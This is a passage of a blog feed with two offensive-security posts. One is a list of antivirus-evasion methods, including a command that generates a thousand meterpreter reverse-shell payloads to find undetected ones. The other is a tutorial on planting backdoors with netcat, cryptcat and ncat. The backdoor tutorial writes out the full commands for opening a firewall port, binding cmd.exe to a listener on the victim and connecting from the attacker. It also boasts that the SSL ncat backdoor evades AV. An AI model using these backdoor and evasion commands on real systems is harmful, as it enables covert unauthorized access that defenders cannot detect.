&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr10mXP78hFCtLRYnn_FY2qjzgksbKNfPZg436NpaGZSgV10ARrcYuvwE0LrtxECyYQPMtu6biFw7oOLfc9vW5UHNGMj-GgWBTRMHbIN9uFCOHZKegt_kijCFvk6tNqP2-h07DDBarLT1e/s1600/crypter.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;crypter.py&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr10mXP78hFCtLRYnn_FY2qjzgksbKNfPZg436NpaGZSgV10ARrcYuvwE0LrtxECyYQPMtu6biFw7oOLfc9vW5UHNGMj-GgWBTRMHbIN9uFCOHZKegt_kijCFvk6tNqP2-h07DDBarLT1e/s320/crypter.PNG&quot; height=&quot;320&quot; title=&quot;crypter.py&quot; width=&quot;228&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
If you get error while running then change path of structure.c in line 45 &amp;amp; save it , run again.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhElbVbZ-hT0Pj8VRUseLFgvRKyeulCOjEcWUipKHjJ1N6RsCAMg9gane8AipMPUs0i_59fjFd47iZmeqfL_MeENuQWPl9mA8VcBUqzEWPEuMkm4ghapUNE2H2uAryBnVl3xeX_2YAHSCfn/s1600/AV-Crypter.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;AV-report-for-crypter.py-payload&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhElbVbZ-hT0Pj8VRUseLFgvRKyeulCOjEcWUipKHjJ1N6RsCAMg9gane8AipMPUs0i_59fjFd47iZmeqfL_MeENuQWPl9mA8VcBUqzEWPEuMkm4ghapUNE2H2uAryBnVl3xeX_2YAHSCfn/s320/AV-Crypter.PNG&quot; height=&quot;105&quot; title=&quot;AV-report-for-crypter.py-payload&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(7)Brute-force AV Evasion :-&lt;/h3&gt;
&lt;br /&gt;
Genpayloads.py is script to generate lots of payloads , then scan folder for specific after that you have some binary left in folder which does not detected by specific AV.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://bernardodamele.blogspot.co.uk/2011/04/execute-metasploit-payloads-bypassing.html&quot; target=&quot;_blank&quot;&gt;Click here for Original tutorial&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
wget https://raw.github.com/obscuresec/random/master/GenPayloads.py&lt;br /&gt;
python GenPayloads.py windows/meterpreter/reverse_tcp 192.168.1.2 443 1000 yes&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(8)Finding Simple AV Signatures with PowerShell :-&lt;/h3&gt;
&lt;br /&gt;
Awesome tutorial &lt;a href=&quot;http://www.obscuresecurity.blogspot.in/2012/12/finding-simple-av-signatures-with.html&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; to find AV signatures &amp;amp; then change specific bit which trigger AV . It only works with signature-based antivirus .&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(9)Powershell:-&lt;/h3&gt;
&lt;br /&gt;
&lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/08/bypass-av-using-powershell-method-using.html&quot; target=&quot;_blank&quot;&gt;Bypass AV using SET powershell module using Batch file&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://pentesterscript.wordpress.com/2013/10/15/get-shell-using-powersploit/&quot; target=&quot;_blank&quot;&gt;Get shell using powersploit&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://tipstrickshack.blogspot.com/2014/01/deliver-powershell-payload-using-macro.html&quot;&gt;Deliver powershell payload using macro &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(10)Get Shell Using VB script:- &lt;/h3&gt;
&lt;br /&gt;
Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well.&lt;br /&gt;
&lt;br /&gt;
For details tutorial click &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(11)Ghost Writing ASM :-&lt;/h3&gt;
&lt;br /&gt;
Using Metasm To Avoid Antivirus Detection. First generate metasploit payload in raw format then disassmble using metasm which come with metasploit.Add anything you want so long as you don’t break the functionality of the application.After that compile into EXE.&lt;br /&gt;
&lt;br /&gt;
For tutorial click &lt;a href=&quot;http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; .&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(12)Different Pivoting technique to bypass AV :-&lt;/h3&gt;
&lt;br /&gt;
Following are framework &amp;amp; module which are mostly used after getting credentials. It does not flag by AV like traditional psexec.&lt;br /&gt;
&lt;br /&gt;
(1)&lt;a href=&quot;http://tipstrickshack.blogspot.com/2014/02/how-to-install-and-use-veil-catapult-in.html&quot;&gt;Veil-Catapult&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
(2)&lt;a href=&quot;http://www.pentestgeek.com/2013/10/23/smbexec-2-0-released/&quot;&gt;SMBExec&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
(3)&lt;a href=&quot;http://bernardodamele.blogspot.com/2009/12/keimpx-in-action.html&quot;&gt;Keimpx&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
(4)&lt;a href=&quot;https://code.google.com/p/passing-the-hash/&quot;&gt;PTH suite&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
(5)Metasploit module:- powershell_psexec , psexec_psh , psexec_command &lt;br /&gt;
&lt;br /&gt;
If you know other methods for AV evasion then please comment here. &lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/5916782611321898696/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/list-of-differnet-av-evasion-frameworks.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/5916782611321898696'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/5916782611321898696'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/list-of-differnet-av-evasion-frameworks.html' title='List of Differnet AV evasion Frameworks.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-jZP01JHipH2PVvdzM95JY7BcvK2NT7OCw58mvkoapzN7ZD3aj1MUYZGUWVzBFc5iGXDkMOaEoURVBv3idNcAdN3KsL-Ttg8GGef6-LX_v_TSLaZrgiTKakIHymsLf6qLbDi2BaDpRiml/s72-c/msfevasion.png" height="72" width="72"/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-189299860145992756</id><published>2013-10-24T17:30:00.000+05:30</published><updated>2013-10-24T17:47:59.852+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="post-exploitation"/><title type='text'>Backdoor using Netcat, cryptcat , ncat.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Today we are gonna talk about Netcat &amp;amp; its alternative ; i assume that all of you are familiar with Netcat. If not than &lt;a href=&quot;http://en.wikipedia.org/wiki/Netcat&quot; target=&quot;_blank&quot;&gt;read here&lt;/a&gt;.&amp;nbsp; Also i assume that you have already open port 455 using following command.&lt;br /&gt;
&lt;br /&gt;
netsh firewall add portopening TCP 455 &quot;Service Firewall&quot; ENABLE ALL&lt;br /&gt;
&lt;br /&gt;
Attacker `s I.P : 192.168.56.1&lt;br /&gt;
&lt;br /&gt;
Victim`s I.P.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : 192.168.56.101&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
We will talk about Netcat, cryptcat &amp;amp; ncat.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(A)Netcat:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
Netcat is used as backdoor. After gaining access to machine , we are creating &quot;netcat&quot; as startup service using changes to the system registry . And then we are gonna open port for communication. At attacker side just start&amp;nbsp; netcat listener. &lt;a href=&quot;http://www.offensive-security.com/metasploit-unleashed/Netcat_Backdoor&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt; is tutorial on &lt;a href=&quot;http://www.offensive-security.com/metasploit-unleashed/Netcat_Backdoor&quot; target=&quot;_blank&quot;&gt;how to create netcat backdoor?&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
But if you know about method used in that tutorial ; there are some disadvantages of using netcat.&lt;br /&gt;
&lt;br /&gt;
(1)Most of AV flag netcat as hacking tool :- I know You can use crypter , but still general behavior detection&amp;nbsp; possible by AV.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRWM2IiHQjfn9s5ENFozp_2ZI52SAW6aVMC11G-JTl0f8YYqEVIhKmcctZtWxVKCLpwRienjO2Hu6GCx0CxH3ZCe_JDDTZyvkYt3pm1KJhUMyTPacJnYJ6bI5WLK-0-IL80SPjyoQtzVFn/s1600/netcat-virus.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;netcat-virustotal&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRWM2IiHQjfn9s5ENFozp_2ZI52SAW6aVMC11G-JTl0f8YYqEVIhKmcctZtWxVKCLpwRienjO2Hu6GCx0CxH3ZCe_JDDTZyvkYt3pm1KJhUMyTPacJnYJ6bI5WLK-0-IL80SPjyoQtzVFn/s1600/netcat-virus.PNG&quot; title=&quot;netcat-virustotal&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;https://www.virustotal.com/en/file/be4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b/analysis/&quot; target=&quot;_blank&quot;&gt;Virustotal link of netcat&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
(2)Clear text communication (No encryption):-anyone from same network can view your communication.Also due to clear text communication firewall or AV can popup &amp;amp; block our communication.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi79QviMinjYikOok9nmImITGlHE_Ol_ygT2cLa1Y9ImMvc-SY9fNVjxlCA2XR53NfZe1ZgqNCRpnZCtK3XbGqVs6U43f3FWHbaUv7sVB6HB3J0QFZEbu8slV6lkGx5jbu43pY4LKSnpyEh/s1600/netcat_wireshark.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;netcat-capture-traffic-using-wireshark&quot; border=&quot;0&quot; height=&quot;247&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi79QviMinjYikOok9nmImITGlHE_Ol_ygT2cLa1Y9ImMvc-SY9fNVjxlCA2XR53NfZe1ZgqNCRpnZCtK3XbGqVs6U43f3FWHbaUv7sVB6HB3J0QFZEbu8slV6lkGx5jbu43pY4LKSnpyEh/s320/netcat_wireshark.PNG&quot; title=&quot;netcat-capture-traffic-using-wireshark&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
(3)No authentication:- anyone can start listner to connect back to our backdoor , because there is no mechanism to verify that user are authorized or not. &lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(B)Cryptcat:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
Cryptcat is same as netcat but in advanced it provide encryption &amp;amp; authentication mechanism.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
&lt;b&gt;How to install cryptcat?&lt;/b&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
In case of backtrack , apt-get install cryptcat .&lt;br /&gt;
&lt;br /&gt;
If you are in other linux OS , then you have to manually installed it from source ; because in repository it does not come with e option , so we can not bind any program to it.&lt;br /&gt;
&lt;br /&gt;
So download source from &lt;a href=&quot;http://sourceforge.net/projects/cryptcat/&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; .&lt;/div&gt;
&lt;br /&gt;
unzip it , change directory &amp;amp; enter following command&lt;br /&gt;
&lt;br /&gt;
make unix&lt;br /&gt;
&lt;br /&gt;
To make exe(windows compatible) from source , use visual studio.&lt;br /&gt;
&lt;br /&gt;
root@bt:~# cryptcat -h&lt;br /&gt;
[v1.10]&lt;br /&gt;
connect to somewhere:&amp;nbsp;&amp;nbsp;&amp;nbsp; nc [-options] hostname port[s] [ports] ... &lt;br /&gt;
listen for inbound:&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; nc -l -p port [-options] [hostname] [port]&lt;br /&gt;
options:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -e prog&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; program to exec after connect [dangerous!!]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -g gateway&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; source-routing hop point[s], up to 8&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -G num&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; source-routing pointer: 4, 8, 12, ...&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; this cruft&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -k secret&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; set the shared secret&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -i secs&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; delay interval for lines sent, ports scanned&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -l&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; listen mode, for inbound connects&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -n&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; numeric-only IP addresses, no DNS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -o file&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; hex dump of traffic&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -p port&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; local port number&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -r&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; randomize local and remote ports&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -s addr&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; local source address&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -u&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; UDP mode&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -v&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; verbose [use twice to be more verbose]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -w secs&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; timeout for connects and final net reads&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; -z&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; zero-I/O mode [used for scanning]&lt;br /&gt;
&lt;br /&gt;
Most of options are same as netcat, but look at new option as -k , it provide password for communication.&lt;br /&gt;
&lt;br /&gt;
On victim machine type following command&lt;br /&gt;
&lt;br /&gt;
cryptcat -Ldp 455 -e cmd.exe&lt;br /&gt;
&lt;br /&gt;
On attacker side , setup listner&lt;br /&gt;
&lt;br /&gt;
cryptcat 192.168.56.101 455&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLqYZOFoLgfpFq9cmeLA8xK4XQVjFvxjO8QRKZKghINomsujYwyJvDDNsTSkC-ORsKjrKZ7kPgtrEAUPvjsnXsk33Acq51aZ-L5FTnvr9MH0Y4aiuXQqimdTskNFOX639zZa63-RwS4c9x/s1600/cryptcat.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;backdoor-using-cryptcat&quot; border=&quot;0&quot; height=&quot;98&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLqYZOFoLgfpFq9cmeLA8xK4XQVjFvxjO8QRKZKghINomsujYwyJvDDNsTSkC-ORsKjrKZ7kPgtrEAUPvjsnXsk33Acq51aZ-L5FTnvr9MH0Y4aiuXQqimdTskNFOX639zZa63-RwS4c9x/s400/cryptcat.PNG&quot; title=&quot;backdoor-using-cryptcat&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Look at following figure ; where we capture traffic using wireshark ; it`s encrypted.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSaUrjUAyeKMQDtuEE2flfi5THnFU7rLboPuIhMwryZupqsEjlpQEnx-cxi_qqZ56S_-Dp6zCFXwD3yzd-hcxgHiF3JWEihUlcVydfhez7KLuR0QfWa4aAnkQIIkyXYSbUwmgfNBLeyQ9k/s1600/cryptcat-capture-traffic-wireshark.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;cryptcat-capture-traffic&quot; border=&quot;0&quot; height=&quot;245&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSaUrjUAyeKMQDtuEE2flfi5THnFU7rLboPuIhMwryZupqsEjlpQEnx-cxi_qqZ56S_-Dp6zCFXwD3yzd-hcxgHiF3JWEihUlcVydfhez7KLuR0QfWa4aAnkQIIkyXYSbUwmgfNBLeyQ9k/s320/cryptcat-capture-traffic-wireshark.PNG&quot; title=&quot;cryptcat-capture-traffic&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
You can also provide -k option for authentication.So in case of cryptcat we got authentication &amp;amp; encryption.&lt;br /&gt;
&lt;br /&gt;
But still it detected by AV.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjal6i7r7jvBvQ3Za7v-bHH1rskMBMbWqc3xBNDrCZg0C2ER7AtEIXuI_YdlC-oLRPx3MoHZAcD29xUI6vav1nJRSJMc0YamNU7FeFHrKBwNnoyOOlE6NSgyvdPCfi-jsbdUGGwebRHItrU/s1600/crptcat-virustotal.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;cryptcat virustotal&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjal6i7r7jvBvQ3Za7v-bHH1rskMBMbWqc3xBNDrCZg0C2ER7AtEIXuI_YdlC-oLRPx3MoHZAcD29xUI6vav1nJRSJMc0YamNU7FeFHrKBwNnoyOOlE6NSgyvdPCfi-jsbdUGGwebRHItrU/s1600/crptcat-virustotal.PNG&quot; title=&quot;cryptcat virustotal&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;https://www.virustotal.com/en/file/71fdaf9ce3a4ae5843c526452746b7bd2ec80e84513b6ffbc47c63aa95dc8164/analysis/1382614430/&quot; target=&quot;_blank&quot;&gt; Virustotal link&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(3)Ncat:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat.Ncat&amp;nbsp; come with nmap , so in attacker side we have already installed ncat.&amp;nbsp;&lt;/div&gt;
&lt;br /&gt;
To download ncat for windwos click &lt;a href=&quot;http://nmap.org/dist/ncat-portable-5.59BETA1.zip&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
View man page of ncat or ncat --help ; it has so many option.&lt;br /&gt;
&lt;br /&gt;
For encryption &amp;amp; authentication you can use ssl ,ssl cert, ssl key ,ssl verify.&lt;br /&gt;
&lt;br /&gt;
on victim side:-&lt;br /&gt;
&lt;br /&gt;
ncat -lvp 455 --ssl -e cmd.exe --allow 192.168.56.1&lt;br /&gt;
&lt;br /&gt;
I encrypt communication using ssl &amp;amp; only allow 192.168.56.1 ip to connect back.It`s possible to connect back using spoofing I.P.&lt;br /&gt;
&lt;br /&gt;
on attacker side&lt;br /&gt;
&lt;br /&gt;
ncat 192.168.56.101 445 --ssl&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfdh9BUQg6IDf24DKtPBK1nzxo937BGZAK4c_cQTJicXczLSWa_mgK3iZgQpa__aAhmCO3xDBuCIRkD4gL0CBMSo7w_ySvujTL0w_bYbvB_WvGM61xUg90qlWjtpt9teox9SRwNGfHMcG9/s1600/ncat-ssl.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;ncat-backdoor&quot; border=&quot;0&quot; height=&quot;100&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfdh9BUQg6IDf24DKtPBK1nzxo937BGZAK4c_cQTJicXczLSWa_mgK3iZgQpa__aAhmCO3xDBuCIRkD4gL0CBMSo7w_ySvujTL0w_bYbvB_WvGM61xUg90qlWjtpt9teox9SRwNGfHMcG9/s400/ncat-ssl.PNG&quot; title=&quot;ncat-backdoor&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
And it does not detected by AV.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilgaYIsR-VHX-JYsEcNQuD6Nv9KayKURFTbBcfJiXEhbSgHrC1ZEVMXvZNe55zBqE7vZ7icicfLzYNq7yYOrRcTh4Cci4zNXf1YXDpG8hN9zSCIU7uB-H-hu3k5lqQ4dsQ1tL7_jQf6jZM/s1600/ncat-virustotal.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;cryptcat virustotal&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilgaYIsR-VHX-JYsEcNQuD6Nv9KayKURFTbBcfJiXEhbSgHrC1ZEVMXvZNe55zBqE7vZ7icicfLzYNq7yYOrRcTh4Cci4zNXf1YXDpG8hN9zSCIU7uB-H-hu3k5lqQ4dsQ1tL7_jQf6jZM/s1600/ncat-virustotal.PNG&quot; title=&quot;ncat-virustotal&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;https://www.virustotal.com/en/file/5e107ea10383110bd801fb7de11f59ee35f02b8e1defcadf34c0e3e769df9341/analysis/&quot; target=&quot;_blank&quot;&gt;Virustotal Link&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
So with help of ncat , we can get around of our problems which are no-authentication, no-encryption, caught by AV.&lt;/div&gt;
